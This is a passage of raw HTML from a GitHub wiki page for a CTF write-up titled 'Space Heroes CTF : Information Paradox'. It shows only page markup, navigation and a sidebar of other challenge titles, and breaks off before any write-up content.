flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> </div> </label></form> </div></div> </div> <div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div> Sign up </div> </div> </div> </div></header> </div> <div id="start-of-content" class="show-on-focus"></div> <div id="js-flash-container" data-turbo-replace> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div> </div> </div></div> </template></div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" > <div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace> <div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;"> <div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> not1cyyy </span> <span>/</span> CTF-Writeups <span></span><span>Public</span> </div> </div> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span> <div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>7</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div> </div> <div id="responsive-meta-container" data-turbo-replace></div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75A.75.75 0 0 1 .75 1h4.253c1.227 0 2.317.59 3 1.501A3.743 3.743 0 0 1 11.006 1h4.245a.75.75 0 0 1 .75.75v10.5a.75.75 0 0 1-.75.75h-4.507a2.25 2.25 0 0 0-1.591.659l-.622.621a.75.75 0 0 1-1.06 0l-.622-.621A2.25 2.25 0 0 0 5.258 13H.75a.75.75 0 0 1-.75-.75Zm7.251 10.324.004-5.073-.002-2.253A2.25 2.25 0 0 0 5.003 2.5H1.5v9h3.757a3.75 3.75 0 0 1 1.994.574ZM8.755 4.75l-.004 7.322a3.752 3.752 0 0 1 1.992-.572H14.5v-9h-3.495a2.25 2.25 0 0 0-2.25 2.25Z"></path></svg> <span>Wiki</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/not1cyyy/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Wiki Security Insights </details-menu></details></div></nav> </div> <turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " > <div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4 page" id="wiki-wrapper"> <div class="d-flex flex-column flex-md-row gh-header"> <h1 class="flex-auto min-width-0 mb-2 mb-md-0 mr-0 mr-md-2 gh-header-title">Space Heroes CTF : Information Paradox</h1> <div class="mt-0 mt-lg-1 flex-shrink-0 gh-header-actions"> Jump to bottom </div> </div> <div class="mt-2 mt-md-1 pb-3 gh-header-meta"> Firas Chaib edited this page <relative-time datetime="2022-04-17T00:33:44Z" class="no-wrap">Apr 17, 2022</relative-time> · 3 revisions </div> <div id="wiki-content" class="mt-4"> <div data-view-component="true" class="Layout Layout--flowRow-until-md Layout--sidebarPosition-end Layout--sidebarPosition-flowRow-end"> <div data-view-component="true" class="Layout-sidebar"> <div class="wiki-rightbar"> <div id="wiki-pages-box" class="mb-4 wiki-pages-box js-wiki-pages-box" role="navigation"> <div class="Box Box--condensed color-shadow-small"> <div class="Box-header js-wiki-toggle-collapse" style="cursor: pointer"> <h3 class="Box-title"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toggle-display"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-right js-wiki-sidebar-toggle-display d-none"> <path d="m6.427 4.427 3.396 3.396a.25.25 0 0 1 0 .354l-3.396 3.396A.25.25 0 0 1 6 11.396V4.604a.25.25 0 0 1 .427-.177Z"></path></svg> Pages <span>14</span> </h3> </div> <div class=" js-wiki-sidebar-toggle-display"> <div class="filter-bar"> <input type="text" id="wiki-pages-filter" class="form-control input-sm input-block js-filterable-field" placeholder="Find a page…" aria-label="Find a page…"> </div> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Home</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Home/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> GDG Algiers CTF : franklin last words</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/GDG-Algiers-CTF-:-franklin-last-words/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PatriotCTF : Banner</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PatriotCTF-:-Banner/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PatriotCTF : CoruptAAAAd</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PatriotCTF-:-CoruptAAAAd/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Eavesdrop</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Eavesdrop/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Operation Oni</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Operation-Oni/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Sleuthkit Apprentice</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Sleuthkit-Apprentice/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : st3g0</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-st3g0/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Transposition Trial</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Transposition-Trial/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Easy Crypto Challenge</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Easy-Crypto-Challenge/_toc"> </include-fragment></details> <details class="details-reset" open> <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" 